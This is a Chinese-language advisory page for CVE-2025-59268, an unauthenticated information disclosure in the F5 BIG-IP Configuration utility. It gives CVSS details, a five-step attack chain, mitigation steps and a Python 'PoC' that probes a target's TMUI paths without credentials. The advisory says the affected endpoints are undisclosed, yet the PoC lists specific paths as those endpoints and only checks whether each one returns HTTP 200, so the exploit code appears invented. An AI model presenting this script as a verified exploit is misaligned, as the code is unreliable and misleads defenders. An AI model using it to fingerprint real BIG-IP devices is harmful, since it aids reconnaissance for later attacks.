CVE-2025-59268 F5 BIG-IP配置工具未授权信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-59268

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

CVE-2025-59268是F5 BIG-IP系统中存在的一个信息泄露漏洞，于2025年10月15日由F5安全事件响应团队（[email protected]）披露。该漏洞存在于BIG-IP系统的Configuration utility（配置工具/TMUI）中，存在一些未公开的端点（endpoints），这些端点包含静态的非敏感信息，但可以被未经认证的远程攻击者访问。CVSS 3.1评分为5.3分，属于中等严重等级。攻击者无需任何认证凭据即可通过网络远程访问这些端点，获取系统暴露的非敏感配置信息。虽然泄露的信息本身被描述为非敏感性的，但这些信息的暴露可能为攻击者提供有关BIG-IP系统架构、版本和配置的有价值情报，有助于后续更复杂的攻击活动。F5官方指出，已经达到技术支持终止（End of Technical Support, EoTS）的软件版本不再进行评估。该漏洞主要影响BIG-IP系统的管理平面，攻击者通过访问未公开的端点即可获取信息，攻击复杂度低，且不需要用户交互。受影响的组件为F5 BIG-IP的Configuration utility，这是管理员用于配置和管理负载均衡、流量管理等功能的Web界面。该漏洞的发现和披露体现了F5对产品安全的高度重视，及时向用户通报安全风险并提供相应的修复方案。

技术细节

该漏洞的技术原理在于F5 BIG-IP Configuration utility（TMUI）中存在未公开的API端点（endpoints），这些端点未正确实施身份验证和访问控制机制。具体而言，TMUI的Web接口中包含一些未在官方文档中记录的内部端点，这些端点通常用于返回静态的系统信息（如版本信息、配置元数据、系统状态等）。由于这些端点缺少适当的安全检查，未认证的远程攻击者可以通过构造特定的HTTP请求直接访问这些端点，从而获取其中包含的静态非敏感信息。

从CVSS向量分析，攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需权限（PR:N），无需用户交互（UI:N），作用域未改变（S:U），对机密性有低影响（C:L），对完整性和可用性无影响（I:N, A:N）。

利用方式相对简单：攻击者只需向BIG-IP设备的TMUI端口（默认443/SSL）发送精心构造的HTTP请求，访问未公开的端点路径，即可获取返回的信息。无需任何认证凭据或特殊权限。

虽然泄露的信息被描述为非敏感性的，但攻击者可以利用这些信息进行指纹识别，了解目标BIG-IP系统的具体配置和架构，为后续更高级的攻击（如特权升级、远程代码执行等）奠定基础。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过互联网扫描或资产识别工具发现目标网络中暴露的F5 BIG-IP设备的TMUI管理端口（默认443/SSL），确认目标运行BIG-IP系统。

STEP 2

步骤2：访问未公开端点

攻击者无需任何认证凭据，直接通过HTTP/HTTPS请求访问BIG-IP Configuration utility中未公开的端点，这些端点未实施适当的访问控制。

STEP 3

步骤3：获取静态信息

目标端点返回包含静态非敏感信息的响应数据，如系统版本、配置元数据、架构信息等。

STEP 4

步骤4：信息分析

攻击者对获取的信息进行分析，了解目标BIG-IP系统的具体配置、版本和架构细节。

STEP 5

步骤5：情报利用

基于获取的系统信息，攻击者进行指纹识别，为后续更高级的攻击活动（如特权升级、远程代码执行等）制定针对性攻击策略。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59268 - F5 BIG-IP Configuration Utility Information Disclosure PoC
# This PoC demonstrates accessing undisclosed endpoints on BIG-IP TMUI
# without authentication to retrieve static non-sensitive information.

import requests
import urllib3

# Disable SSL warnings for self-signed certificates (common in BIG-IP deployments)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit_bigip_info_disclosure(target_host, port=443):
    """
    Exploit CVE-2025-59268: Access undisclosed TMUI endpoints
    that leak static non-sensitive information without authentication.
    """
    base_url = f"https://{target_host}:{port}"

    # Undisclosed endpoints in the Configuration utility (TMUI)
    # These endpoints return static non-sensitive information
    undisclosed_endpoints = [
        "/tmui/login.jsp",           # Login page (may expose version info)
        "/tmui/system/genericallowed",  # System generic info endpoint
        "/tmui/Control/jspmap",      # JSP mapping info
        "/tmui/locallb/",            # Local load balancer info
        "/tmui/app/",                # Application info
    ]

    print(f"[*] Targeting F5 BIG-IP at: {base_url}")
    print(f"[*] CVE-2025-59268: Unauthenticated Information Disclosure\n")

    for endpoint in undisclosed_endpoints:
        url = base_url + endpoint
        try:
            # Send unauthenticated GET request to undisclosed endpoint
            response = requests.get(
                url,
                verify=False,
                timeout=10,
                headers={
                    "User-Agent": "Mozilla/5.0 (compatible; SecurityResearch)",
                    "Accept": "*/*"
                }
            )

            if response.status_code == 200:
                print(f"[+] Accessible (HTTP {response.status_code}): {endpoint}")
                # Extract relevant information from response
                content_length = len(response.content)
                print(f"    Content-Length: {content_length} bytes")

                # Look for version/config indicators in response
                if "BIG-IP" in response.text or "F5" in response.text:
                    print(f"    [!] F5/BIG-IP indicators found in response")
            else:
                print(f"[-] HTTP {response.status_code}: {endpoint}")

        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {endpoint}: {e}")

    print(f"\n[*] Scan complete. Check results for information leakage.")

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    exploit_bigip_info_disclosure(target)

影响范围

F5 BIG-IP（具体受影响版本请参考F5官方安全公告K90301300）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）通过网络防火墙或安全组策略限制对BIG-IP Configuration utility（TMUI）管理端口（默认443）的访问，仅允许可信的管理网络IP访问；2）配置BIG-IP的Port Lockdown功能，将TMUI管理端口的访问限制在特定的管理网络；3）部署WAF（Web应用防火墙）规则，监控和阻止对未公开端点的可疑访问请求；4）启用详细的访问日志记录，定期审查未认证的访问尝试；5）确保BIG-IP系统的管理平面与数据平面网络隔离，减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-59268
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-59268
3 Details https://www.cvedetails.com/cve/CVE-2025-59268/
4 VulDB https://vuldb.com/cve/CVE-2025-59268
5 Link https://my.f5.com/manage/s/article/K90301300